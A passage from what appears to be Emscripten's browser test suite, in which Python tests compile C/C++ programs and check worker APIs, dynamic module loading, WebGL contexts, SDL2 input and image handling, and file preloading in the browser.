('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', test_file('browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify=0', '-s', 'EXPORTED_FUNCTIONS=[_one,_two,_three,_four]', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
self.run_process([EMCC, test_file('browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=[_one,_two]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
@parameterized({
'non-lz4': ([],),
'lz4': (['-s', 'LZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'] + args)
def test_mmap_file(self):
create_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid', 'test.js'))
try_delete(test_file('uuid', 'test.js.map'))
# Now run test in browser
self.btest(test_file('uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(test_file('test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(test_file('webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
def test_webgl_unmasked_vendor_webgl(self):
self.btest(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure=1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(test_file('webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(test_file('html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(test_file('webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest(test_file('test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(test_file('webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure=1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(test_file('webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure=1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
